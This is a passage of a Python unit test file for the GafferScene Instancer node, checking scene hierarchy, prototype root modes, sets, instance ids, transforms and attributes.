self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/bar/{i}".format( i=i ) ), IECore.InternedStringVectorData( [ "baz" ] ) )
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/bar/{i}/baz".format( i=i ) ), IECore.InternedStringVectorData( [ "cube" ] ) )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/bar/{i}".format( i=i ) ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/bar/{i}/baz".format( i=i ) ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/bar/{i}/baz/cube".format( i=i ) ), script["cube"]["out"].object( "/cube" ) )
self.assertSceneValid( script["instancer"]["out"] )
def assertUnderspecifiedRoots( self, script ) :
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances" ), IECore.InternedStringVectorData( [] ) )
self.assertEqual( script["instancer"]["out"].object( "/object/instances" ), IECore.NullObject.defaultNullObject() )
def assertSingleRoot( self, script ) :
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances" ), IECore.InternedStringVectorData( [ "foo" ] ) )
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/foo" ), IECore.InternedStringVectorData( [ "0", "1", "2", "3" ] ) )
for i in [ "0", "1", "2", "3" ] :
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/foo/{i}".format( i=i ) ), IECore.InternedStringVectorData( [ "bar" ] ) )
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/foo/{i}/bar".format( i=i ) ), IECore.InternedStringVectorData( [ "sphere" ] ) )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/foo/{i}".format( i=i ) ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/foo/{i}/bar".format( i=i ) ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/foo/{i}/bar/sphere".format( i=i ) ), script["sphere"]["out"].object( "/sphere" ) )
self.assertSceneValid( script["instancer"]["out"] )
def assertConflictingRootNames( self, script ) :
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances" ), IECore.InternedStringVectorData( [ "bar", "bar1" ] ) )
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/bar" ), IECore.InternedStringVectorData( [ "0", "3" ] ) )
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/bar1" ), IECore.InternedStringVectorData( [ "1", "2" ] ) )
self.assertEqual( script["instancer"]["out"].object( "/object/instances" ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/bar" ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/bar1" ), IECore.NullObject.defaultNullObject() )
for i in [ "0", "3" ] :
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/bar/{i}".format( i=i ) ), IECore.InternedStringVectorData( [ "sphere" ] ) )
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/bar/{i}/sphere".format( i=i ) ), IECore.InternedStringVectorData( [] ) )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/bar/{i}".format( i=i ) ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/bar/{i}/sphere".format( i=i ) ), script["sphere"]["out"].object( "/sphere" ) )
for i in [ "1", "2" ] :
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/bar1/{i}".format( i=i ) ), IECore.InternedStringVectorData( [ "baz" ] ) )
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/bar1/{i}/baz".format( i=i ) ), IECore.InternedStringVectorData( [ "cube" ] ) )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/bar1/{i}".format( i=i ) ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/bar1/{i}/baz".format( i=i ) ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/bar1/{i}/baz/cube".format( i=i ) ), script["cube"]["out"].object( "/cube" ) )
self.assertSceneValid( script["instancer"]["out"] )
def assertSwappedRoots( self, script ) :
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances" ), IECore.InternedStringVectorData( [ "bar", "foo" ] ) )
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/bar" ), IECore.InternedStringVectorData( [ "0", "3" ] ) )
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/foo" ), IECore.InternedStringVectorData( [ "1", "2" ] ) )
self.assertEqual( script["instancer"]["out"].object( "/object/instances" ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/bar" ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/foo" ), IECore.NullObject.defaultNullObject() )
for i in [ "0", "3" ] :
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/bar/{i}".format( i=i ) ), IECore.InternedStringVectorData( [ "baz" ] ) )
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/bar/{i}/baz".format( i=i ) ), IECore.InternedStringVectorData( [ "cube" ] ) )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/bar/{i}".format( i=i ) ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/bar/{i}/baz".format( i=i ) ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/bar/{i}/baz/cube".format( i=i ) ), script["cube"]["out"].object( "/cube" ) )
for i in [ "1", "2" ] :
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/foo/{i}".format( i=i ) ), IECore.InternedStringVectorData( [ "bar" ] ) )
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/foo/{i}/bar".format( i=i ) ), IECore.InternedStringVectorData( [ "sphere" ] ) )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/foo/{i}".format( i=i ) ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/foo/{i}/bar".format( i=i ) ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/foo/{i}/bar/sphere".format( i=i ) ), script["sphere"]["out"].object( "/sphere" ) )
self.assertSceneValid( script["instancer"]["out"] )
def assertSkippedRoots( self, script ) :
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances" ), IECore.InternedStringVectorData( [ "bar" ] ) )
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/bar" ), IECore.InternedStringVectorData( [ "1", "2" ] ) )
self.assertEqual( script["instancer"]["out"].object( "/object/instances" ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/bar" ), IECore.NullObject.defaultNullObject() )
for i in [ "1", "2" ] :
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/bar/{i}".format( i=i ) ), IECore.InternedStringVectorData( [ "baz" ] ) )
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/bar/{i}/baz".format( i=i ) ), IECore.InternedStringVectorData( [ "cube" ] ) )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/bar/{i}".format( i=i ) ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/bar/{i}/baz".format( i=i ) ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/bar/{i}/baz/cube".format( i=i ) ), script["cube"]["out"].object( "/cube" ) )
self.assertSceneValid( script["instancer"]["out"] )
def assertRootsToLeaves( self, script ) :
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances" ), IECore.InternedStringVectorData( [ "sphere", "cube" ] ) )
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/sphere" ), IECore.InternedStringVectorData( [ "0", "3" ] ) )
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/cube" ), IECore.InternedStringVectorData( [ "1", "2" ] ) )
self.assertEqual( script["instancer"]["out"].object( "/object/instances" ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/sphere" ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/cube" ), IECore.NullObject.defaultNullObject() )
for i in [ "0", "3" ] :
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/sphere/{i}".format( i=i ) ), IECore.InternedStringVectorData( [] ) )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/sphere/{i}".format( i=i ) ), script["sphere"]["out"].object( "/sphere" ) )
for i in [ "1", "2" ] :
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/cube/{i}".format( i=i ) ), IECore.InternedStringVectorData( [] ) )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/cube/{i}".format( i=i ) ), script["cube"]["out"].object( "/cube" ) )
self.assertSceneValid( script["instancer"]["out"] )
def assertRootsToRoot( self, script ) :
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances" ), IECore.InternedStringVectorData( [ "root" ] ) )
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/root" ), IECore.InternedStringVectorData( [ "0", "1", "2", "3" ] ) )
self.assertEqual( script["instancer"]["out"].object( "/object/instances" ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/root" ), IECore.NullObject.defaultNullObject() )
for i in [ "0", "1", "2", "3" ] :
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/root/{i}".format( i=i ) ), IECore.InternedStringVectorData( [ "foo", "bar" ] ) )
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/root/{i}/foo".format( i=i ) ), IECore.InternedStringVectorData( [ "bar" ] ) )
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/root/{i}/foo/bar".format( i=i ) ), IECore.InternedStringVectorData( [ "sphere" ] ) )
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/root/{i}/bar".format( i=i ) ), IECore.InternedStringVectorData( [ "baz" ] ) )
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/root/{i}/bar/baz".format( i=i ) ), IECore.InternedStringVectorData( [ "cube" ] ) )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/root/{i}".format( i=i ) ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/root/{i}/foo".format( i=i ) ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/root/{i}/foo/bar".format( i=i ) ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/root/{i}/foo/bar/sphere".format( i=i ) ), script["sphere"]["out"].object( "/sphere" ) )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/root/{i}/bar".format( i=i ) ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/root/{i}/bar/baz".format( i=i ) ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/root/{i}/bar/baz/cube".format( i=i ) ), script["cube"]["out"].object( "/cube" ) )
def testIndexedRootsList( self ) :
script = self.buildPrototypeRootsScript()
script["instancer"]["prototypeMode"].setValue( GafferScene.Instancer.PrototypeMode.IndexedRootsList )
script["instancer"]["prototypeRootsList"].setValue( IECore.StringVectorData( [] ) )
self.assertRootsMatchPrototypeSceneChildren( script )
script["instancer"]["prototypeRootsList"].setValue( IECore.StringVectorData( [ "", ] ) )
self.assertUnderspecifiedRoots( script )
script["instancer"]["prototypeRootsList"].setValue( IECore.StringVectorData( [ "/foo", ] ) )
self.assertSingleRoot( script )
# roots list matching the prototype root children
# we expect the same results as without a roots list
script["instancer"]["prototypeRootsList"].setValue( IECore.StringVectorData( [ "/foo", "/bar" ] ) )
self.assertRootsMatchPrototypeSceneChildren( script )
script["instancer"]["prototypeRootsList"].setValue( IECore.StringVectorData( [ "/foo/bar", "/bar" ] ) )
self.assertConflictingRootNames( script )
# opposite order to the prototype root children
script["instancer"]["prototypeRootsList"].setValue( IECore.StringVectorData( [ "/bar", "/foo" ] ) )
self.assertSwappedRoots( script )
script["instancer"]["prototypeRootsList"].setValue( IECore.StringVectorData( [ "", "/bar" ] ) )
self.assertSkippedRoots( script )
# roots all the way to the leaf level of the prototype scene
script["instancer"]["prototypeRootsList"].setValue( IECore.StringVectorData( [ "/foo/bar/sphere", "/bar/baz/cube" ] ) )
self.assertRootsToLeaves( script )
# we can specify the root of the prototype scene
script["instancer"]["prototypeRootsList"].setValue( IECore.StringVectorData( [ "/" ] ) )
self.assertRootsToRoot( script )
script["instancer"]["prototypeRootsList"].setValue( IECore.StringVectorData( [ "/foo", "/does/not/exist" ] ) )
six.assertRaisesRegex( self,
Gaffer.ProcessException, '.*Prototype root "/does/not/exist" does not exist.*',
script["instancer"]["out"].childNames, "/object/instances",
)
def testIndexedRootsVariable( self ) :
script = self.buildPrototypeRootsScript()
script["instancer"]["prototypeMode"].setValue( GafferScene.Instancer.PrototypeMode.IndexedRootsVariable )
script["variables"]["primitiveVariables"]["prototypeRoots"]["value"].setValue( IECore.StringVectorData( [] ) )
six.assertRaisesRegex( self,
Gaffer.ProcessException, ".*must specify at least one root location.*",
script["instancer"]["out"].childNames, "/object/instances",
)
script["variables"]["primitiveVariables"]["prototypeRoots"]["value"].setValue( IECore.StringVectorData( [ "", ] ) )
self.assertUnderspecifiedRoots( script )
script["variables"]["primitiveVariables"]["prototypeRoots"]["value"].setValue( IECore.StringVectorData( [ "/foo", ] ) )
self.assertSingleRoot( script )
# roots list matching the prototype root children
# we expect the same results as without a roots list
script["variables"]["primitiveVariables"]["prototypeRoots"]["value"].setValue( IECore.StringVectorData( [ "/foo", "/bar" ] ) )
self.assertRootsMatchPrototypeSceneChildren( script )
script["variables"]["primitiveVariables"]["prototypeRoots"]["value"].setValue( IECore.StringVectorData( [ "/foo/bar", "/bar" ] ) )
self.assertConflictingRootNames( script )
# opposite order to the prototype root children
script["variables"]["primitiveVariables"]["prototypeRoots"]["value"].setValue( IECore.StringVectorData( [ "/bar", "/foo" ] ) )
self.assertSwappedRoots( script )
script["variables"]["primitiveVariables"]["prototypeRoots"]["value"].setValue( IECore.StringVectorData( [ "", "/bar" ] ) )
self.assertSkippedRoots( script )
# roots all the way to the leaf level of the prototype scene
script["variables"]["primitiveVariables"]["prototypeRoots"]["value"].setValue( IECore.StringVectorData( [ "/foo/bar/sphere", "/bar/baz/cube" ] ) )
self.assertRootsToLeaves( script )
# we can specify the root of the prototype scene
script["variables"]["primitiveVariables"]["prototypeRoots"]["value"].setValue( IECore.StringVectorData( [ "/" ] ) )
self.assertRootsToRoot( script )
script["variables"]["primitiveVariables"]["prototypeRoots"]["value"].setValue( IECore.StringVectorData( [ "/foo", "/does/not/exist" ] ) )
six.assertRaisesRegex( self,
Gaffer.ProcessException, '.*Prototype root "/does/not/exist" does not exist.*',
script["instancer"]["out"].childNames, "/object/instances",
)
script["instancer"]["prototypeRoots"].setValue( "notAPrimVar" )
six.assertRaisesRegex( self,
Gaffer.ProcessException, ".*must be Constant StringVectorData when using IndexedRootsVariable mode.*does not exist.*",
script["instancer"]["out"].childNames, "/object/instances",
)
# the vertex primvar should fail
script["instancer"]["prototypeRoots"].setValue( "root" )
six.assertRaisesRegex( self,
Gaffer.ProcessException, ".*must be Constant StringVectorData when using IndexedRootsVariable mode.*",
script["instancer"]["out"].childNames, "/object/instances",
)
def testRootPerVertex( self ) :
script = self.buildPrototypeRootsScript()
script["instancer"]["prototypeMode"].setValue( GafferScene.Instancer.PrototypeMode.RootPerVertex )
script["instancer"]["prototypeRoots"].setValue( "root" )
def updateRoots( roots, indices ) :
points = script["objectToScene"]["object"].getValue()
points["root"] = IECoreScene.PrimitiveVariable( points["root"].interpolation, roots, indices )
script["objectToScene"]["object"].setValue( points )
updateRoots( IECore.StringVectorData( [] ), IECore.IntVectorData( [] ) )
six.assertRaisesRegex( self,
Gaffer.ProcessException, ".*must specify at least one root location.*",
script["instancer"]["out"].childNames, "/object/instances",
)
updateRoots( IECore.StringVectorData( [ "", ] ), IECore.IntVectorData( [ 0, 0, 0, 0 ] ) )
self.assertUnderspecifiedRoots( script )
updateRoots( IECore.StringVectorData( [ "/foo", ] ), IECore.IntVectorData( [ 0, 0, 0, 0 ] ) )
self.assertSingleRoot( script )
# roots list matching the prototype root children
# we expect the same results as without a roots list
updateRoots( IECore.StringVectorData( [ "/foo", "/bar" ] ), IECore.IntVectorData( [ 0, 1, 1, 0 ] ) )
self.assertRootsMatchPrototypeSceneChildren( script )
updateRoots( IECore.StringVectorData( [ "/foo/bar", "/bar" ] ), IECore.IntVectorData( [ 0, 1, 1, 0 ] ) )
self.assertConflictingRootNames( script )
# opposite order to the prototype root children
updateRoots( IECore.StringVectorData( [ "/bar", "/foo" ] ), IECore.IntVectorData( [ 0, 1, 1, 0 ] ) )
self.assertSwappedRoots( script )
updateRoots( IECore.StringVectorData( [ "", "/bar" ] ), IECore.IntVectorData( [ 0, 1, 1, 0 ] ) )
self.assertSkippedRoots( script )
# roots all the way to the leaf level of the prototype scene
updateRoots( IECore.StringVectorData( [ "/foo/bar/sphere", "/bar/baz/cube" ] ), IECore.IntVectorData( [ 0, 1, 1, 0 ] ) )
self.assertRootsToLeaves( script )
# we can specify the root of the prototype scene
updateRoots( IECore.StringVectorData( [ "/", ] ), IECore.IntVectorData( [ 0, 0, 0, 0 ] ) )
self.assertRootsToRoot( script )
updateRoots( IECore.StringVectorData( [ "/foo", "/does/not/exist" ] ), IECore.IntVectorData( [ 0, 1, 1, 0 ] ) )
six.assertRaisesRegex( self,
Gaffer.ProcessException, '.*Prototype root "/does/not/exist" does not exist.*',
script["instancer"]["out"].childNames, "/object/instances",
)
script["instancer"]["prototypeRoots"].setValue( "notAPrimVar" )
six.assertRaisesRegex( self,
Gaffer.ProcessException, ".*must be Vertex StringVectorData when using RootPerVertex mode.*does not exist.*",
script["instancer"]["out"].childNames, "/object/instances",
)
# the constant primvar should fail
script["instancer"]["prototypeRoots"].setValue( "prototypeRoots" )
six.assertRaisesRegex( self,
Gaffer.ProcessException, ".*must be Vertex StringVectorData when using RootPerVertex mode.*",
script["instancer"]["out"].childNames, "/object/instances",
)
def testSets( self ) :
points = IECoreScene.PointsPrimitive( IECore.V3fVectorData( [ imath.V3f( x, 0, 0 ) for x in range( 0, 4 ) ] ) )
points["index"] = IECoreScene.PrimitiveVariable(
IECoreScene.PrimitiveVariable.Interpolation.Vertex,
IECore.IntVectorData( [ 0, 1, 1, 0 ] ),
)
objectToScene = GafferScene.ObjectToScene()
objectToScene["object"].setValue( points )
sphere = GafferScene.Sphere()
sphere["sets"].setValue( "sphereSet" )
cube = GafferScene.Cube()
cube["sets"].setValue( "cubeSet" )
cubeGroup = GafferScene.Group()
cubeGroup["name"].setValue( "cubeGroup" )
cubeGroup["in"][0].setInput( cube["out"] )
instances = GafferScene.Parent()
instances["in"].setInput( sphere["out"] )
instances["children"][0].setInput( cubeGroup["out"] )
instances["parent"].setValue( "/" )
instancer = GafferScene.Instancer()
instancer["in"].setInput( objectToScene["out"] )
instancer["prototypes"].setInput( instances["out"] )
instancer["parent"].setValue( "/object" )
instancer["prototypeIndex"].setValue( "index" )
self.assertEqual(
instancer["out"]["setNames"].getValue(),
IECore.InternedStringVectorData( [ "sphereSet", "cubeSet" ] )
)
self.assertEqual(
set( instancer["out"].set( "sphereSet" ).value.paths() ),
{
"/object/instances/sphere/0",
"/object/instances/sphere/3",
}
)
self.assertEqual(
set( instancer["out"].set( "cubeSet" ).value.paths() ),
{
"/object/instances/cubeGroup/1/cube",
"/object/instances/cubeGroup/2/cube",
}
)
# Test encapsulation options
encapInstancer = GafferScene.Instancer()
encapInstancer["in"].setInput( objectToScene["out"] )
encapInstancer["prototypes"].setInput( instances["out"] )
encapInstancer["parent"].setValue( "/object" )
encapInstancer["prototypeIndex"].setValue( "index" )
encapInstancer["encapsulateInstanceGroups"].setValue( True )
unencapFilter = GafferScene.PathFilter()
unencapFilter["paths"].setValue( IECore.StringVectorData( [ "/..." ] ) )
unencap = GafferScene.Unencapsulate()
unencap["in"].setInput( encapInstancer["out"] )
unencap["filter"].setInput( unencapFilter["out"] )
# Sets should be empty while encapsulated
self.assertEqual( encapInstancer["out"].set( "sphereSet" ).value.paths(), [] )
self.assertEqual( encapInstancer["out"].set( "cubeSet" ).value.paths(), [] )
# But should match after unencapsulating
self.assertScenesEqual( unencap["out"], instancer["out"] )
def testSetsWithDeepPrototypeRoots( self ) :
script = self.buildPrototypeRootsScript()
script["sphere"]["sets"].setValue( "sphereSet" )
script["cube"]["sets"].setValue( "cubeSet" )
script["set"] = GafferScene.Set()
script["set"]["name"].setValue( "barSet" )
script["set"]["in"].setInput( script["prototypes"]["out"] )
script["barFilter"] = GafferScene.PathFilter()
script["barFilter"]["paths"].setValue( IECore.StringVectorData( [ "/foo/bar", "/bar" ] ) )
script["set"]["filter"].setInput( script["barFilter"]["out"] )
script["instancer"]["prototypes"].setInput( script["set"]["out"] )
script["instancer"]["prototypeMode"].setValue( GafferScene.Instancer.PrototypeMode.IndexedRootsList )
script["instancer"]["prototypeRootsList"].setValue( IECore.StringVectorData( [ "/foo/bar", "/bar" ] ) )
self.assertEqual(
script["instancer"]["out"]["setNames"].getValue(),
IECore.InternedStringVectorData( [ "sphereSet", "cubeSet", "barSet" ] )
)
self.assertEqual(
set( script["instancer"]["out"].set( "sphereSet" ).value.paths() ),
{
"/object/instances/bar/0/sphere",
"/object/instances/bar/3/sphere",
}
)
self.assertEqual(
set( script["instancer"]["out"].set( "cubeSet" ).value.paths() ),
{
"/object/instances/bar1/1/baz/cube",
"/object/instances/bar1/2/baz/cube",
}
)
self.assertEqual(
set( script["instancer"]["out"].set( "barSet" ).value.paths() ),
{
"/object/instances/bar/0",
"/object/instances/bar/3",
"/object/instances/bar1/1",
"/object/instances/bar1/2",
}
)
def testIds( self ) :
points = IECoreScene.PointsPrimitive( IECore.V3fVectorData( [ imath.V3f( x, 0, 0 ) for x in range( 0, 4 ) ] ) )
points["id"] = IECoreScene.PrimitiveVariable(
IECoreScene.PrimitiveVariable.Interpolation.Vertex,
IECore.IntVectorData( [ 10, 100, 111, 5 ] ),
)
points["index"] = IECoreScene.PrimitiveVariable(
IECoreScene.PrimitiveVariable.Interpolation.Vertex,
IECore.IntVectorData( [ 0, 1, 0, 1 ] ),
)
objectToScene = GafferScene.ObjectToScene()
objectToScene["object"].setValue( points )
sphere = GafferScene.Sphere()
cube = GafferScene.Cube()
instances = GafferScene.Parent()
instances["in"].setInput( sphere["out"] )
instances["children"][0].setInput( cube["out"] )
instances["parent"].setValue( "/" )
instancer = GafferScene.Instancer()
instancer["in"].setInput( objectToScene["out"] )
instancer["prototypes"].setInput( instances["out"] )
instancer["parent"].setValue( "/object" )
instancer["prototypeIndex"].setValue( "index" )
instancer["id"].setValue( "id" )
self.assertEqual( instancer["out"].childNames( "/object/instances" ), IECore.InternedStringVectorData( [ "sphere", "cube" ] ) )
self.assertEqual( instancer["out"].childNames( "/object/instances/sphere" ), IECore.InternedStringVectorData( [ "10", "111" ] ) )
self.assertEqual( instancer["out"].childNames( "/object/instances/cube" ), IECore.InternedStringVectorData( [ "5", "100" ] ) )
self.assertEqual( instancer["out"].childNames( "/object/instances/sphere/10" ), IECore.InternedStringVectorData() )
self.assertEqual( instancer["out"].childNames( "/object/instances/sphere/111" ), IECore.InternedStringVectorData() )
self.assertEqual( instancer["out"].childNames( "/object/instances/cube/100" ), IECore.InternedStringVectorData() )
self.assertEqual( instancer["out"].childNames( "/object/instances/cube/5" ), IECore.InternedStringVectorData() )
self.assertEqual( instancer["out"].object( "/object/instances" ), IECore.NullObject.defaultNullObject() )
self.assertEqual( instancer["out"].object( "/object/instances/sphere" ), IECore.NullObject.defaultNullObject() )
self.assertEqual( instancer["out"].object( "/object/instances/cube" ), IECore.NullObject.defaultNullObject() )
self.assertEqual( instancer["out"].object( "/object/instances/sphere/10" ), sphere["out"].object( "/sphere" ) )
self.assertEqual( instancer["out"].object( "/object/instances/sphere/111" ), sphere["out"].object( "/sphere" ) )
self.assertEqual( instancer["out"].object( "/object/instances/cube/100" ), cube["out"].object( "/cube" ) )
self.assertEqual( instancer["out"].object( "/object/instances/cube/5" ), cube["out"].object( "/cube" ) )
self.assertEqual( instancer["out"].transform( "/object/instances" ), imath.M44f() )
self.assertEqual( instancer["out"].transform( "/object/instances/sphere" ), imath.M44f() )
self.assertEqual( instancer["out"].transform( "/object/instances/cube" ), imath.M44f() )
self.assertEqual( instancer["out"].transform( "/object/instances/sphere/10" ), imath.M44f() )
self.assertEqual( instancer["out"].transform( "/object/instances/sphere/111" ), imath.M44f().translate( imath.V3f( 2, 0, 0 ) ) )
self.assertEqual( instancer["out"].transform( "/object/instances/cube/100" ), imath.M44f().translate( imath.V3f( 1, 0, 0 ) ) )
self.assertEqual( instancer["out"].transform( "/object/instances/cube/5" ), imath.M44f().translate( imath.V3f( 3, 0, 0 ) ) )
six.assertRaisesRegex( self,
Gaffer.ProcessException,
'Instancer.out.transform : Instance id "77" is invalid. Topology may have changed during shutter.',
instancer["out"].transform, "/object/instances/cube/77"
)
self.assertSceneValid( instancer["out"] )
def testNegativeIdsAndIndices( self ) :
points = IECoreScene.PointsPrimitive( IECore.V3fVectorData( [ imath.V3f( x, 0, 0 ) for x in range( 0, 2 ) ] ) )
points["id"] = IECoreScene.PrimitiveVariable(
IECoreScene.PrimitiveVariable.Interpolation.Vertex,
IECore.IntVectorData( [ -10, -5 ] ),
)
points["index"] = IECoreScene.PrimitiveVariable(
IECoreScene.PrimitiveVariable.Interpolation.Vertex,
IECore.IntVectorData( [ -1, -2 ] ),
)
objectToScene = GafferScene.ObjectToScene()
objectToScene["object"].setValue( points )
sphere = GafferScene.Sphere()
cube = GafferScene.Cube()
instances = GafferScene.Parent()
instances["in"].setInput( sphere["out"] )
instances["children"][0].setInput( cube["out"] )
instances["parent"].setValue( "/" )
instancer = GafferScene.Instancer()
instancer["in"].setInput( objectToScene["out"] )
instancer["prototypes"].setInput( instances["out"] )
instancer["parent"].setValue( "/object" )
instancer["prototypeIndex"].setValue( "index" )
instancer["id"].setValue( "id" )
self.assertEqual( instancer["out"].childNames( "/object/instances" ), IECore.InternedStringVectorData( [ "sphere", "cube" ] ) )
self.assertEqual( instancer["out"].childNames( "/object/instances/sphere" ), IECore.InternedStringVectorData( [ "-5" ] ) )
self.assertEqual( instancer["out"].childNames( "/object/instances/cube" ), IECore.InternedStringVectorData( [ "-10" ] ) )
self.assertEqual( instancer["out"].childNames( "/object/instances/sphere/-5" ), IECore.InternedStringVectorData() )
self.assertEqual( instancer["out"].childNames( "/object/instances/cube/-10" ), IECore.InternedStringVectorData() )
self.assertEqual( instancer["out"].object( "/object/instances" ), IECore.NullObject.defaultNullObject() )
self.assertEqual( instancer["out"].object( "/object/instances/sphere" ), IECore.NullObject.defaultNullObject() )
self.assertEqual( instancer["out"].object( "/object/instances/cube" ), IECore.NullObject.defaultNullObject() )
self.assertEqual( instancer["out"].object( "/object/instances/sphere/-5" ), sphere["out"].object( "/sphere" ) )
self.assertEqual( instancer["out"].object( "/object/instances/cube/-10" ), cube["out"].object( "/cube" ) )
self.assertSceneValid( instancer["out"] )
def testDuplicateIds( self ) :
points = IECoreScene.PointsPrimitive( IECore.V3fVectorData( [ imath.V3f( x, 0, 0 ) for x in range( 6 ) ] ) )
points["id"] = IECoreScene.PrimitiveVariable(
IECoreScene.PrimitiveVariable.Interpolation.Vertex,
IECore.IntVectorData( [ 0, 0, 2, 2, 4, 4 ] ),
)
objectToScene = GafferScene.ObjectToScene()
objectToScene["object"].setValue( points )
sphere = GafferScene.Sphere()
instancer = GafferScene.Instancer()
instancer["in"].setInput( objectToScene["out"] )
instancer["prototypes"].setInput( sphere["out"] )
instancer["parent"].setValue( "/object" )
instancer["id"].setValue( "id" )
self.assertSceneValid( instancer["out"] )
self.assertEqual( instancer["out"].childNames( "/object/instances/sphere" ), IECore.InternedStringVectorData( [ "0", "2", "4" ] ) )
self.assertEqual( instancer["out"].transform( "/object/instances/sphere/0" ), imath.M44f().translate( imath.V3f( 0, 0, 0 ) ) )
self.assertEqual( instancer["out"].transform( "/object/instances/sphere/2" ), imath.M44f().translate( imath.V3f( 2, 0, 0 ) ) )
self.assertEqual( instancer["out"].transform( "/object/instances/sphere/4" ), imath.M44f().translate( imath.V3f( 4, 0, 0 ) ) )
def testAttributes( self ) :
points = IECoreScene.PointsPrimitive( IECore.V3fVectorData( [ imath.V3f( x, 0, 0 ) for x in range( 0, 2 ) ] ) )
points["testFloat"] = IECoreScene.PrimitiveVariable(
IECoreScene.PrimitiveVariable.Interpolation.Vertex,
IECore.FloatVectorData( [ 0, 1 ] ),
)
points["testColor"] = IECoreScene.PrimitiveVariable(
IECoreScene.PrimitiveVariable.Interpolation.Vertex,
IECore.Color3fVectorData( [ imath.Color3f( 1, 0, 0 ), imath.Color3f( 0, 1, 0 ) ] ),
)
points["testPoint"] = IECoreScene.PrimitiveVariable(
IECoreScene.PrimitiveVariable.Interpolation.Vertex,
IECore.V3fVectorData(
[ imath.V3f( 0, 0, 0 ), imath.V3f( 1, 1, 1 ) ],
IECore.GeometricData.Interpretation.Point
),
)
objectToScene = GafferScene.ObjectToScene()
objectToScene["object"].setValue( points )
sphere = GafferScene.Sphere()
instancer = GafferScene.Instancer()
instancer["in"].setInput( objectToScene["out"] )
instancer["prototypes"].setInput( sphere["out"] )
instancer["parent"].setValue( "/object" )
self.assertEqual(
instancer["out"].attributes( "/object/instances" ),
IECore.CompoundObject()
)
self.assertEqual(
